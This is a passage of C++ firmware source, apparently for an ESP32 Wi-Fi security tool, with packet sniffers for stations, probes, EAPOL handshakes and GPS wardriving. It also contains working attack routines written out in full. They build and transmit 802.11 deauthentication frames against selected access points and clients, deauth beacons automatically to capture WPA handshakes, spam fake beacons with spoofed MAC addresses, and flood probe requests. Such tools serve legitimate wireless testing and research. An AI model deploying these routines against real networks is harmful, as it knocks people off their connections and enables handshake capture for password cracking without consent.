/* Stuff to care about now
* ap_is_src
* ap_index
*/
// Check if we already have this station
bool in_list = false;
for (int i = 0; i < stations->size(); i++) {
mac_match = true;
for (int x = 0; x < 6; x++) {
//Serial.println((String)snifferPacket->payload[x + 10] + " | " + (String)access_points->get(i).bssid[x]);
if (snifferPacket->payload[x + frame_offset] != stations->get(i).mac[x]) {
mac_match = false;
//Serial.println("MACs do not match");
break;
}
}
if (mac_match) {
in_list = true;
break;
}
}
getMAC(dst_addr, snifferPacket->payload, 4);
// Check if dest is broadcast
if ((in_list) || (strcmp(dst_addr, "ff:ff:ff:ff:ff:ff") == 0))
return;
// Add to list of stations
Station sta = {
{snifferPacket->payload[frame_offset],
snifferPacket->payload[frame_offset + 1],
snifferPacket->payload[frame_offset + 2],
snifferPacket->payload[frame_offset + 3],
snifferPacket->payload[frame_offset + 4],
snifferPacket->payload[frame_offset + 5]},
false};
stations->add(sta);
// Print findings to serial
Serial.print((String)stations->size() + ": ");
char sta_addr[] = "00:00:00:00:00:00";
if (ap_is_src) {
Serial.print("ap: ");
Serial.print(ap_addr);
Serial.print(" -> sta: ");
getMAC(sta_addr, snifferPacket->payload, 4);
Serial.println(sta_addr);
}
else {
Serial.print("sta: ");
getMAC(sta_addr, snifferPacket->payload, 10);
Serial.print(sta_addr);
Serial.print(" -> ap: ");
Serial.println(ap_addr);
}
display_string.concat(sta_addr);
display_string.concat(" -> ");
display_string.concat(access_points->get(ap_index).essid);
int temp_len = display_string.length();
#ifdef HAS_SCREEN
for (int i = 0; i < 40 - temp_len; i++)
{
display_string.concat(" ");
}
Serial.print(" ");
if (display_obj.display_buffer->size() == 0)
{
display_obj.loading = true;
display_obj.display_buffer->add(display_string);
display_obj.loading = false;
}
#endif
// Add station index to AP in list
//access_points->get(ap_index).stations->add(stations->size() - 1);
AccessPoint ap = access_points->get(ap_index);
ap.stations->add(stations->size() - 1);
access_points->set(ap_index, ap);
buffer_obj.append(snifferPacket, len);
}
void WiFiScan::rawSnifferCallback(void* buf, wifi_promiscuous_pkt_type_t type)
{
extern WiFiScan wifi_scan_obj;
wifi_promiscuous_pkt_t *snifferPacket = (wifi_promiscuous_pkt_t*)buf;
WifiMgmtHdr *frameControl = (WifiMgmtHdr*)snifferPacket->payload;
wifi_pkt_rx_ctrl_t ctrl = (wifi_pkt_rx_ctrl_t)snifferPacket->rx_ctrl;
int len = snifferPacket->rx_ctrl.sig_len;
String display_string = "";
if (type == WIFI_PKT_MGMT)
{
len -= 4;
int fctl = ntohs(frameControl->fctl);
const wifi_ieee80211_packet_t *ipkt = (wifi_ieee80211_packet_t *)snifferPacket->payload;
const WifiMgmtHdr *hdr = &ipkt->hdr;
}
if (wifi_scan_obj.currentScanMode == WIFI_SCAN_SIG_STREN) {
bool found = false;
uint8_t targ_index = 0;
AccessPoint targ_ap;
// Check list of APs
for (int i = 0; i < access_points->size(); i++) {
if (access_points->get(i).selected) {
uint8_t addr[] = {snifferPacket->payload[10],
snifferPacket->payload[11],
snifferPacket->payload[12],
snifferPacket->payload[13],
snifferPacket->payload[14],
snifferPacket->payload[15]};
// Compare AP bssid to ssid of recvd packet
for (int x = 0; x < 6; x++) {
if (addr[x] != access_points->get(i).bssid[x]) {
found = false;
break;
}
else
found = true;
}
if (found) {
targ_ap = access_points->get(i);
targ_index = i;
break;
}
}
}
if (!found)
return;
if ((targ_ap.rssi + 5 < snifferPacket->rx_ctrl.rssi) || (snifferPacket->rx_ctrl.rssi + 5 < targ_ap.rssi)) {
targ_ap.rssi = snifferPacket->rx_ctrl.rssi;
access_points->set(targ_index, targ_ap);
Serial.print((String)access_points->get(targ_index).essid + " RSSI: " + (String)access_points->get(targ_index).rssi);
display_string = (String)access_points->get(targ_index).essid + " RSSI: " + (String)access_points->get(targ_index).rssi;
}
else
return;
}
else {
Serial.print("RSSI: ");
Serial.print(snifferPacket->rx_ctrl.rssi);
Serial.print(" Ch: ");
Serial.print(snifferPacket->rx_ctrl.channel);
Serial.print(" BSSID: ");
char addr[] = "00:00:00:00:00:00";
getMAC(addr, snifferPacket->payload, 10);
Serial.print(addr);
display_string.concat(text_table4[0]);
display_string.concat(snifferPacket->rx_ctrl.rssi);
display_string.concat(" ");
display_string.concat(addr);
}
int temp_len = display_string.length();
#ifdef HAS_SCREEN
for (int i = 0; i < 40 - temp_len; i++)
{
display_string.concat(" ");
}
Serial.print(" ");
if (display_obj.display_buffer->size() == 0)
{
display_obj.loading = true;
display_obj.display_buffer->add(display_string);
display_obj.loading = false;
}
#endif
Serial.println();
buffer_obj.append(snifferPacket, len);
}
void WiFiScan::deauthSnifferCallback(void* buf, wifi_promiscuous_pkt_type_t type)
{
wifi_promiscuous_pkt_t *snifferPacket = (wifi_promiscuous_pkt_t*)buf;
WifiMgmtHdr *frameControl = (WifiMgmtHdr*)snifferPacket->payload;
wifi_pkt_rx_ctrl_t ctrl = (wifi_pkt_rx_ctrl_t)snifferPacket->rx_ctrl;
int len = snifferPacket->rx_ctrl.sig_len;
String display_string = "";
if (type == WIFI_PKT_MGMT)
{
len -= 4;
int fctl = ntohs(frameControl->fctl);
const wifi_ieee80211_packet_t *ipkt = (wifi_ieee80211_packet_t *)snifferPacket->payload;
const WifiMgmtHdr *hdr = &ipkt->hdr;
// If we dont the buffer size is not 0, don't write or else we get CORRUPT_HEAP
#ifdef HAS_SCREEN
int buf = display_obj.display_buffer->size();
#else
int buf = 0;
#endif
if ((snifferPacket->payload[0] == 0xA0 || snifferPacket->payload[0] == 0xC0 ) && (buf == 0))
{
delay(random(0, 10));
Serial.print("RSSI: ");
Serial.print(snifferPacket->rx_ctrl.rssi);
Serial.print(" Ch: ");
Serial.print(snifferPacket->rx_ctrl.channel);
Serial.print(" BSSID: ");
char addr[] = "00:00:00:00:00:00";
char dst_addr[] = "00:00:00:00:00:00";
getMAC(addr, snifferPacket->payload, 10);
getMAC(dst_addr, snifferPacket->payload, 4);
Serial.print(addr);
Serial.print(" -> ");
Serial.print(dst_addr);
display_string.concat(text_table4[0]);
display_string.concat(snifferPacket->rx_ctrl.rssi);
display_string.concat(" ");
display_string.concat(addr);
#ifdef HAS_SCREEN
for (int i = 0; i < 19 - snifferPacket->payload[37]; i++)
{
display_string.concat(" ");
}
Serial.print(" ");
if (display_obj.display_buffer->size() == 0)
{
display_obj.loading = true;
display_obj.display_buffer->add(display_string);
display_obj.loading = false;
}
#endif
Serial.println();
buffer_obj.append(snifferPacket, len);
}
}
}
void WiFiScan::probeSnifferCallback(void* buf, wifi_promiscuous_pkt_type_t type) {
extern WiFiScan wifi_scan_obj;
wifi_promiscuous_pkt_t *snifferPacket = (wifi_promiscuous_pkt_t*)buf;
WifiMgmtHdr *frameControl = (WifiMgmtHdr*)snifferPacket->payload;
wifi_pkt_rx_ctrl_t ctrl = (wifi_pkt_rx_ctrl_t)snifferPacket->rx_ctrl;
int len = snifferPacket->rx_ctrl.sig_len;
String display_string = "";
if (type == WIFI_PKT_MGMT)
{
len -= 4;
int fctl = ntohs(frameControl->fctl);
const wifi_ieee80211_packet_t *ipkt = (wifi_ieee80211_packet_t *)snifferPacket->payload;
const WifiMgmtHdr *hdr = &ipkt->hdr;
// If we dont the buffer size is not 0, don't write or else we get CORRUPT_HEAP
//#ifdef HAS_SCREEN
// int buf = display_obj.display_buffer->size();
//#else
int buf = 0;
//#endif
if ((snifferPacket->payload[0] == 0x40) && (buf == 0))
{
if (wifi_scan_obj.currentScanMode == WIFI_SCAN_PROBE) {
delay(random(0, 10));
Serial.print("RSSI: ");
Serial.print(snifferPacket->rx_ctrl.rssi);
Serial.print(" Ch: ");
Serial.print(snifferPacket->rx_ctrl.channel);
Serial.print(" Client: ");
char addr[] = "00:00:00:00:00:00";
getMAC(addr, snifferPacket->payload, 10);
Serial.print(addr);
display_string.concat(addr);
Serial.print(" Requesting: ");
display_string.concat(" -> ");
for (int i = 0; i < snifferPacket->payload[25]; i++)
{
Serial.print((char)snifferPacket->payload[26 + i]);
display_string.concat((char)snifferPacket->payload[26 + i]);
}
// Print spaces because of the rotating lines of the hardware scroll.
// The same characters print from previous lines so I just overwrite them
// with spaces.
#ifdef HAS_SCREEN
for (int i = 0; i < 19 - snifferPacket->payload[25]; i++)
{
display_string.concat(" ");
}
if (display_obj.display_buffer->size() == 0)
{
//while (display_obj.printing)
// delay(1);
display_obj.loading = true;
display_obj.display_buffer->add(display_string);
display_obj.loading = false;
}
#endif
Serial.println();
buffer_obj.append(snifferPacket, len);
}
else if (wifi_scan_obj.currentScanMode == WIFI_SCAN_STATION_WAR_DRIVE) {
#ifdef HAS_GPS
if (gps_obj.getGpsModuleStatus()) {
bool do_save = false;
// Check if we've already seen this AP
char addr[] = "00:00:00:00:00:00";
getMAC(addr, snifferPacket->payload, 10);
if (wifi_scan_obj.seen_mac(reinterpret_cast<unsigned char*>(addr)))
return;
Serial.print("RSSI: ");
Serial.print(snifferPacket->rx_ctrl.rssi);
Serial.print(" Ch: ");
Serial.print(snifferPacket->rx_ctrl.channel);
Serial.print(" BSSID: ");
Serial.print(addr);
display_string.concat(addr);
if (gps_obj.getFixStatus()) {
do_save = true;
display_string.concat(" | Lt: " + gps_obj.getLat());
display_string.concat(" | Ln: " + gps_obj.getLon());
}
else
display_string.concat(" | GPS: No Fix");
int temp_len = display_string.length();
#ifdef HAS_SCREEN
for (int i = 0; i < 40 - temp_len; i++)
{
display_string.concat(" ");
}
Serial.print(" ");
if (display_obj.display_buffer->size() == 0)
{
display_obj.loading = true;
display_obj.display_buffer->add(display_string);
display_obj.loading = false;
}
#endif
Serial.println();
//wifi_scan_obj.save_mac(reinterpret_cast<unsigned char*>(addr));
if (do_save) {
String wardrive_line = (String)addr + "," + (String)addr + ",," + gps_obj.getDatetime() + "," + (String)snifferPacket->rx_ctrl.channel + "," + (String)snifferPacket->rx_ctrl.rssi + "," + gps_obj.getLat() + "," + gps_obj.getLon() + "," + gps_obj.getAlt() + "," + gps_obj.getAccuracy() + ",WIFI";
Serial.println(wardrive_line);
buffer_obj.append(wardrive_line);
}
}
#endif
}
}
}
}
void WiFiScan::beaconListSnifferCallback(void* buf, wifi_promiscuous_pkt_type_t type) {
wifi_promiscuous_pkt_t *snifferPacket = (wifi_promiscuous_pkt_t*)buf;
WifiMgmtHdr *frameControl = (WifiMgmtHdr*)snifferPacket->payload;
wifi_pkt_rx_ctrl_t ctrl = (wifi_pkt_rx_ctrl_t)snifferPacket->rx_ctrl;
int len = snifferPacket->rx_ctrl.sig_len;
String display_string = "";
String essid = "";
bool found = false;
if (type == WIFI_PKT_MGMT)
{
len -= 4;
int fctl = ntohs(frameControl->fctl);
const wifi_ieee80211_packet_t *ipkt = (wifi_ieee80211_packet_t *)snifferPacket->payload;
const WifiMgmtHdr *hdr = &ipkt->hdr;
// If we dont the buffer size is not 0, don't write or else we get CORRUPT_HEAP
#ifdef HAS_SCREEN
int buf = display_obj.display_buffer->size();
#else
int buf = 0;
#endif
if ((snifferPacket->payload[0] == 0x40) && (buf == 0))
{
for (uint8_t i = 0; i < snifferPacket->payload[25]; i++)
{
essid.concat((char)snifferPacket->payload[26 + i]);
}
for (int i = 0; i < ssids->size(); i++) {
if (ssids->get(i).essid == essid) {
Serial.println("Found a sheep");
found = true;
break;
}
}
if (!found)
return;
delay(random(0, 10));
Serial.print("RSSI: ");
Serial.print(snifferPacket->rx_ctrl.rssi);
Serial.print(" Ch: ");
Serial.print(snifferPacket->rx_ctrl.channel);
Serial.print(" Client: ");
char addr[] = "00:00:00:00:00:00";
getMAC(addr, snifferPacket->payload, 10);
Serial.print(addr);
display_string.concat(addr);
Serial.print(" Requesting: ");
display_string.concat(" -> ");
// ESSID
for (int i = 0; i < snifferPacket->payload[25]; i++)
{
Serial.print((char)snifferPacket->payload[26 + i]);
display_string.concat((char)snifferPacket->payload[26 + i]);
}
// Print spaces because of the rotating lines of the hardware scroll.
// The same characters print from previous lines so I just overwrite them
// with spaces.
#ifdef HAS_SCREEN
for (int i = 0; i < 19 - snifferPacket->payload[25]; i++)
{
display_string.concat(" ");
}
if (display_obj.display_buffer->size() == 0)
{
display_obj.loading = true;
display_obj.display_buffer->add(display_string);
display_obj.loading = false;
}
#endif
Serial.println();
buffer_obj.append(snifferPacket, len);
}
}
}
void WiFiScan::broadcastCustomBeacon(uint32_t current_time, AccessPoint custom_ssid) {
set_channel = random(1,12);
esp_wifi_set_channel(set_channel, WIFI_SECOND_CHAN_NONE);
delay(1);
if (custom_ssid.beacon->size() == 0)
return;
// Randomize SRC MAC
// Randomize SRC MAC
packet[10] = packet[16] = random(256);
packet[11] = packet[17] = random(256);
packet[12] = packet[18] = random(256);
packet[13] = packet[19] = random(256);
packet[14] = packet[20] = random(256);
packet[15] = packet[21] = random(256);
char ESSID[custom_ssid.essid.length() + 1] = {};
custom_ssid.essid.toCharArray(ESSID, custom_ssid.essid.length() + 1);
int realLen = strlen(ESSID);
int ssidLen = random(realLen, 33);
int numSpace = ssidLen - realLen;
//int rand_len = sizeof(rand_reg);
int fullLen = ssidLen;
packet[37] = fullLen;
// Insert my tag
for(int i = 0; i < realLen; i++)
packet[38 + i] = ESSID[i];
for(int i = 0; i < numSpace; i++)
packet[38 + realLen + i] = 0x20;
/////////////////////////////
packet[50 + fullLen] = set_channel;
uint8_t postSSID[13] = {0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x24, 0x30, 0x48, 0x6c, //supported rate
0x03, 0x01, 0x04 /*DSSS (Current Channel)*/ };
// Add everything that goes after the SSID
//for(int i = 0; i < 12; i++)
// packet[38 + fullLen + i] = postSSID[i];
packet[34] = custom_ssid.beacon->get(0);
packet[35] = custom_ssid.beacon->get(1);
esp_wifi_80211_tx(WIFI_IF_AP, packet, sizeof(packet), false);
esp_wifi_80211_tx(WIFI_IF_AP, packet, sizeof(packet), false);
esp_wifi_80211_tx(WIFI_IF_AP, packet, sizeof(packet), false);
packets_sent = packets_sent + 3;
}
void WiFiScan::broadcastCustomBeacon(uint32_t current_time, ssid custom_ssid) {
set_channel = custom_ssid.channel;
esp_wifi_set_channel(set_channel, WIFI_SECOND_CHAN_NONE);
delay(1);
// Randomize SRC MAC
packet[10] = packet[16] = custom_ssid.bssid[0];
packet[11] = packet[17] = custom_ssid.bssid[1];
packet[12] = packet[18] = custom_ssid.bssid[2];
packet[13] = packet[19] = custom_ssid.bssid[3];
packet[14] = packet[20] = custom_ssid.bssid[4];
packet[15] = packet[21] = custom_ssid.bssid[5];
char ESSID[custom_ssid.essid.length() + 1] = {};
custom_ssid.essid.toCharArray(ESSID, custom_ssid.essid.length() + 1);
int ssidLen = strlen(ESSID);
//int rand_len = sizeof(rand_reg);
int fullLen = ssidLen;
packet[37] = fullLen;
// Insert my tag
for(int i = 0; i < ssidLen; i++)
packet[38 + i] = ESSID[i];
/////////////////////////////
packet[50 + fullLen] = set_channel;
uint8_t postSSID[13] = {0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x24, 0x30, 0x48, 0x6c, //supported rate
0x03, 0x01, 0x04 /*DSSS (Current Channel)*/ };
// Add everything that goes after the SSID
for(int i = 0; i < 12; i++)
packet[38 + fullLen + i] = postSSID[i];
esp_wifi_80211_tx(WIFI_IF_AP, packet, sizeof(packet), false);
esp_wifi_80211_tx(WIFI_IF_AP, packet, sizeof(packet), false);
esp_wifi_80211_tx(WIFI_IF_AP, packet, sizeof(packet), false);
packets_sent = packets_sent + 3;
}
// Function to send beacons with random ESSID length
void WiFiScan::broadcastSetSSID(uint32_t current_time, const char* ESSID) {
set_channel = random(1,12);
esp_wifi_set_channel(set_channel, WIFI_SECOND_CHAN_NONE);
delay(1);
// Randomize SRC MAC
packet[10] = packet[16] = random(256);
packet[11] = packet[17] = random(256);
packet[12] = packet[18] = random(256);
packet[13] = packet[19] = random(256);
packet[14] = packet[20] = random(256);
packet[15] = packet[21] = random(256);
int ssidLen = strlen(ESSID);
//int rand_len = sizeof(rand_reg);
int fullLen = ssidLen;
packet[37] = fullLen;
// Insert my tag
for(int i = 0; i < ssidLen; i++)
packet[38 + i] = ESSID[i];
/////////////////////////////
packet[50 + fullLen] = set_channel;
uint8_t postSSID[13] = {0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x24, 0x30, 0x48, 0x6c, //supported rate
0x03, 0x01, 0x04 /*DSSS (Current Channel)*/ };
// Add everything that goes after the SSID
for(int i = 0; i < 12; i++)
packet[38 + fullLen + i] = postSSID[i];
esp_wifi_80211_tx(WIFI_IF_AP, packet, sizeof(packet), false);
esp_wifi_80211_tx(WIFI_IF_AP, packet, sizeof(packet), false);
esp_wifi_80211_tx(WIFI_IF_AP, packet, sizeof(packet), false);
packets_sent = packets_sent + 3;
}
// Function for sending crafted beacon frames
void WiFiScan::broadcastRandomSSID(uint32_t currentTime) {
set_channel = random(1,12);
esp_wifi_set_channel(set_channel, WIFI_SECOND_CHAN_NONE);
delay(1);
// Randomize SRC MAC
packet[10] = packet[16] = random(256);
packet[11] = packet[17] = random(256);
packet[12] = packet[18] = random(256);
packet[13] = packet[19] = random(256);
packet[14] = packet[20] = random(256);
packet[15] = packet[21] = random(256);
packet[37] = 6;
// Randomize SSID (Fixed size 6. Lazy right?)
packet[38] = alfa[random(65)];
packet[39] = alfa[random(65)];
packet[40] = alfa[random(65)];
packet[41] = alfa[random(65)];
packet[42] = alfa[random(65)];
packet[43] = alfa[random(65)];
packet[56] = set_channel;
uint8_t postSSID[13] = {0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x24, 0x30, 0x48, 0x6c, //supported rate
0x03, 0x01, 0x04 /*DSSS (Current Channel)*/ };
// Add everything that goes after the SSID
for(int i = 0; i < 12; i++)
packet[38 + 6 + i] = postSSID[i];
esp_wifi_80211_tx(WIFI_IF_AP, packet, sizeof(packet), false);
//ESP_ERROR_CHECK(esp_wifi_80211_tx(WIFI_IF_AP, packet, sizeof(packet), false));
//ESP_ERROR_CHECK(esp_wifi_80211_tx(WIFI_IF_AP, packet, sizeof(packet), false));
packets_sent = packets_sent + 3;
}
// Function to send probe flood to all "active" access points
void WiFiScan::sendProbeAttack(uint32_t currentTime) {
// Itterate through all access points in list
for (int i = 0; i < access_points->size(); i++) {
// Check if active
if (access_points->get(i).selected) {
this->set_channel = access_points->get(i).channel;
esp_wifi_set_channel(this->set_channel, WIFI_SECOND_CHAN_NONE);
delay(1);
// Build packet
// Randomize SRC MAC
prob_req_packet[10] = random(256);
prob_req_packet[11] = random(256);
prob_req_packet[12] = random(256);
prob_req_packet[13] = random(256);
prob_req_packet[14] = random(256);
prob_req_packet[15] = random(256);
// Set SSID length
int ssidLen = access_points->get(i).essid.length();
int fullLen = ssidLen;
prob_req_packet[25] = fullLen;
// Insert ESSID
char buf[access_points->get(i).essid.length() + 1] = {};
access_points->get(i).essid.toCharArray(buf, access_points->get(i).essid.length() + 1);
for(int i = 0; i < ssidLen; i++)
prob_req_packet[26 + i] = buf[i];
uint8_t postSSID[40] = {0x00, 0x00, 0x01, 0x08, 0x8c, 0x12,
0x18, 0x24, 0x30, 0x48, 0x60, 0x6c,
0x2d, 0x1a, 0xad, 0x01, 0x17, 0xff,
0xff, 0x00, 0x00, 0x7e, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00};
uint8_t good_probe_req_packet[26 + fullLen + 40] = {};
for (int i = 0; i < 26 + fullLen; i++)
good_probe_req_packet[i] = prob_req_packet[i];
for(int i = 0; i < 40; i++)
good_probe_req_packet[26 + fullLen + i] = postSSID[i];
// Send packet
esp_wifi_80211_tx(WIFI_IF_AP, good_probe_req_packet, sizeof(good_probe_req_packet), false);
esp_wifi_80211_tx(WIFI_IF_AP, good_probe_req_packet, sizeof(good_probe_req_packet), false);
esp_wifi_80211_tx(WIFI_IF_AP, good_probe_req_packet, sizeof(good_probe_req_packet), false);
packets_sent = packets_sent + 3;
}
}
}
void WiFiScan::sendDeauthFrame(uint8_t bssid[6], int channel, uint8_t mac[6]) {
WiFiScan::set_channel = channel;
esp_wifi_set_channel(channel, WIFI_SECOND_CHAN_NONE);
delay(1);
// Build AP source packet
deauth_frame_default[4] = mac[0];
deauth_frame_default[5] = mac[1];
deauth_frame_default[6] = mac[2];
deauth_frame_default[7] = mac[3];
deauth_frame_default[8] = mac[4];
deauth_frame_default[9] = mac[5];
deauth_frame_default[10] = bssid[0];
deauth_frame_default[11] = bssid[1];
deauth_frame_default[12] = bssid[2];
deauth_frame_default[13] = bssid[3];
deauth_frame_default[14] = bssid[4];
deauth_frame_default[15] = bssid[5];
deauth_frame_default[16] = bssid[0];
deauth_frame_default[17] = bssid[1];
deauth_frame_default[18] = bssid[2];
deauth_frame_default[19] = bssid[3];
deauth_frame_default[20] = bssid[4];
deauth_frame_default[21] = bssid[5];
// Send packet
esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false);
esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false);
esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false);
packets_sent = packets_sent + 3;
// Build AP dest packet
deauth_frame_default[4] = bssid[0];
deauth_frame_default[5] = bssid[1];
deauth_frame_default[6] = bssid[2];
deauth_frame_default[7] = bssid[3];
deauth_frame_default[8] = bssid[4];
deauth_frame_default[9] = bssid[5];
deauth_frame_default[10] = mac[0];
deauth_frame_default[11] = mac[1];
deauth_frame_default[12] = mac[2];
deauth_frame_default[13] = mac[3];
deauth_frame_default[14] = mac[4];
deauth_frame_default[15] = mac[5];
deauth_frame_default[16] = mac[0];
deauth_frame_default[17] = mac[1];
deauth_frame_default[18] = mac[2];
deauth_frame_default[19] = mac[3];
deauth_frame_default[20] = mac[4];
deauth_frame_default[21] = mac[5];
// Send packet
esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false);
esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false);
esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false);
packets_sent = packets_sent + 3;
}
void WiFiScan::sendDeauthFrame(uint8_t bssid[6], int channel, String dst_mac_str) {
// Itterate through all access points in list
// Check if active
WiFiScan::set_channel = channel;
esp_wifi_set_channel(channel, WIFI_SECOND_CHAN_NONE);
delay(1);
// Build packet
sscanf(dst_mac_str.c_str(), "%2hhx:%2hhx:%2hhx:%2hhx:%2hhx:%2hhx",
&deauth_frame_default[4], &deauth_frame_default[5], &deauth_frame_default[6], &deauth_frame_default[7], &deauth_frame_default[8], &deauth_frame_default[9]);
deauth_frame_default[10] = bssid[0];
deauth_frame_default[11] = bssid[1];
deauth_frame_default[12] = bssid[2];
deauth_frame_default[13] = bssid[3];
deauth_frame_default[14] = bssid[4];
deauth_frame_default[15] = bssid[5];
deauth_frame_default[16] = bssid[0];
deauth_frame_default[17] = bssid[1];
deauth_frame_default[18] = bssid[2];
deauth_frame_default[19] = bssid[3];
deauth_frame_default[20] = bssid[4];
deauth_frame_default[21] = bssid[5];
// Send packet
esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false);
esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false);
esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false);
packets_sent = packets_sent + 3;
}
void WiFiScan::sendDeauthAttack(uint32_t currentTime, String dst_mac_str) {
// Itterate through all access points in list
for (int i = 0; i < access_points->size(); i++) {
// Check if active
if (access_points->get(i).selected) {
this->set_channel = access_points->get(i).channel;
esp_wifi_set_channel(this->set_channel, WIFI_SECOND_CHAN_NONE);
delay(1);
// Build packet
sscanf(dst_mac_str.c_str(), "%2hhx:%2hhx:%2hhx:%2hhx:%2hhx:%2hhx",
&deauth_frame_default[4], &deauth_frame_default[5], &deauth_frame_default[6], &deauth_frame_default[7], &deauth_frame_default[8], &deauth_frame_default[9]);
deauth_frame_default[10] = access_points->get(i).bssid[0];
deauth_frame_default[11] = access_points->get(i).bssid[1];
deauth_frame_default[12] = access_points->get(i).bssid[2];
deauth_frame_default[13] = access_points->get(i).bssid[3];
deauth_frame_default[14] = access_points->get(i).bssid[4];
deauth_frame_default[15] = access_points->get(i).bssid[5];
deauth_frame_default[16] = access_points->get(i).bssid[0];
deauth_frame_default[17] = access_points->get(i).bssid[1];
deauth_frame_default[18] = access_points->get(i).bssid[2];
deauth_frame_default[19] = access_points->get(i).bssid[3];
deauth_frame_default[20] = access_points->get(i).bssid[4];
deauth_frame_default[21] = access_points->get(i).bssid[5];
// Send packet
esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false);
esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false);
esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false);
packets_sent = packets_sent + 3;
}
}
}
void WiFiScan::wifiSnifferCallback(void* buf, wifi_promiscuous_pkt_type_t type)
{
wifi_promiscuous_pkt_t *snifferPacket = (wifi_promiscuous_pkt_t*)buf;
WifiMgmtHdr *frameControl = (WifiMgmtHdr*)snifferPacket->payload;
wifi_pkt_rx_ctrl_t ctrl = (wifi_pkt_rx_ctrl_t)snifferPacket->rx_ctrl;
int len = snifferPacket->rx_ctrl.sig_len;
String display_string = "";
#ifdef HAS_SCREEN
int buff = display_obj.display_buffer->size();
#else
int buff = 0;
#endif
if (type == WIFI_PKT_MGMT)
{
len -= 4;
int fctl = ntohs(frameControl->fctl);
const wifi_ieee80211_packet_t *ipkt = (wifi_ieee80211_packet_t *)snifferPacket->payload;
const WifiMgmtHdr *hdr = &ipkt->hdr;
// If we dont the buffer size is not 0, don't write or else we get CORRUPT_HEAP
#ifdef HAS_ILI9341
if (snifferPacket->payload[0] == 0x80)
{
num_beacon++;
}
else if ((snifferPacket->payload[0] == 0xA0 || snifferPacket->payload[0] == 0xC0 ))
{
num_deauth++;
}
else if (snifferPacket->payload[0] == 0x40)
{
num_probe++;
}
#endif
char addr[] = "00:00:00:00:00:00";
getMAC(addr, snifferPacket->payload, 10);
display_string.concat(addr);
int temp_len = display_string.length();
#ifdef HAS_SCREEN
for (int i = 0; i < 40 - temp_len; i++)
{
display_string.concat(" ");
}
//Serial.print(" ");
#ifdef SCREEN_BUFFER
if (display_obj.display_buffer->size() == 0)
{
display_obj.loading = true;
display_obj.display_buffer->add(display_string);
display_obj.loading = false;
Serial.println(display_string);
}
#endif
#endif
buffer_obj.append(snifferPacket, len);
}
}
void WiFiScan::eapolSnifferCallback(void* buf, wifi_promiscuous_pkt_type_t type)
{
extern WiFiScan wifi_scan_obj;
bool send_deauth = settings_obj.loadSetting<bool>(text_table4[5]);
wifi_promiscuous_pkt_t *snifferPacket = (wifi_promiscuous_pkt_t*)buf;
WifiMgmtHdr *frameControl = (WifiMgmtHdr*)snifferPacket->payload;
wifi_pkt_rx_ctrl_t ctrl = (wifi_pkt_rx_ctrl_t)snifferPacket->rx_ctrl;
int len = snifferPacket->rx_ctrl.sig_len;
String display_string = "";
if (type == WIFI_PKT_MGMT)
{
len -= 4;
int fctl = ntohs(frameControl->fctl);
const wifi_ieee80211_packet_t *ipkt = (wifi_ieee80211_packet_t *)snifferPacket->payload;
const WifiMgmtHdr *hdr = &ipkt->hdr;
}
#ifdef HAS_SCREEN
int buff = display_obj.display_buffer->size();
#else
int buff = 0;
#endif
// Found beacon frame. Decide whether to deauth
if (send_deauth) {
if (snifferPacket->payload[0] == 0x80) {
// Build packet
wifi_scan_obj.deauth_frame_default[10] = snifferPacket->payload[10];
wifi_scan_obj.deauth_frame_default[11] = snifferPacket->payload[11];
wifi_scan_obj.deauth_frame_default[12] = snifferPacket->payload[12];
wifi_scan_obj.deauth_frame_default[13] = snifferPacket->payload[13];
wifi_scan_obj.deauth_frame_default[14] = snifferPacket->payload[14];
wifi_scan_obj.deauth_frame_default[15] = snifferPacket->payload[15];
wifi_scan_obj.deauth_frame_default[16] = snifferPacket->payload[10];
wifi_scan_obj.deauth_frame_default[17] = snifferPacket->payload[11];
wifi_scan_obj.deauth_frame_default[18] = snifferPacket->payload[12];
wifi_scan_obj.deauth_frame_default[19] = snifferPacket->payload[13];
wifi_scan_obj.deauth_frame_default[20] = snifferPacket->payload[14];
wifi_scan_obj.deauth_frame_default[21] = snifferPacket->payload[15];
// Send packet
esp_wifi_80211_tx(WIFI_IF_AP, wifi_scan_obj.deauth_frame_default, sizeof(wifi_scan_obj.deauth_frame_default), false);
delay(1);
}
}
if (( (snifferPacket->payload[30] == 0x88 && snifferPacket->payload[31] == 0x8e)|| ( snifferPacket->payload[32] == 0x88 && snifferPacket->payload[33] == 0x8e) )){
num_eapol++;
Serial.println("Received EAPOL:");
char addr[] = "00:00:00:00:00:00";
getMAC(addr, snifferPacket->payload, 10);
display_string.concat(addr);
int temp_len = display_string.length();
#ifdef HAS_SCREEN
for (int i = 0; i < 40 - temp_len; i++)
{
display_string.concat(" ");
}
Serial.print(" ");
#ifdef SCREEN_BUFFER
if (display_obj.display_buffer->size() == 0)
{
display_obj.loading = true;
display_obj.display_buffer->add(display_string);
display_obj.loading = false;
}
#endif
#else
Serial.println(addr);
#endif
}
buffer_obj.append(snifferPacket, len);
}
void WiFiScan::activeEapolSnifferCallback(void* buf, wifi_promiscuous_pkt_type_t type)
{
extern WiFiScan wifi_scan_obj;
bool send_deauth = settings_obj.loadSetting<bool>(text_table4[5]);
